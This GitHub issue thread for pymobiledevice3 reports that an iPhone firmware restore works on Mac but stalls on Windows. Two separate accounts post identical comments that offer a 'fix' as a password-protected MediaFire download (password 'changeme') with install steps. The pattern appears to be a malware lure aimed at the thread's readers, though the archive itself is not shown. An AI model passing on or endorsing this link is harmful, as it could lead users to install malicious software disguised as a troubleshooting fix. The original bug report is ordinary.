### ISSUE TITLE
The same latest code, the same device and firmware, the Mac can be flashed successfully, but Windows will be blocked

### ISSUE THREAD

**Issue by yinyajiang** [doronz88/pymobiledevice3#1172]
**Describe the bug**
I used the latest code. With the same device and firmware, the flashing was successful on Mac, but Windows would block. Windows would block after "verify-resotre" reached 100%.

ipsw is: iPhone14,7_18.0_22A5338b_Restore.ipsw

The command used is: restore update --erase -i iPhone14,7_18.0_22A5338b_Restore.ipsw

**Logs**
[mac_success.txt](https://github.com/user-attachments/files/16778121/mac_success.txt)
[windows_fail.txt](https://github.com/user-attachments/files/16778126/windows_fail.txt)

## For community
⬇️  **Please click the 👍 reaction instead of leaving a `+1` or 👍  comment**

**Comment by Dnts1** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by qiliq** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by yinyajiang** [comment]
Is it related to the transmission speed? It is obviously much faster on Mac than on Windows.
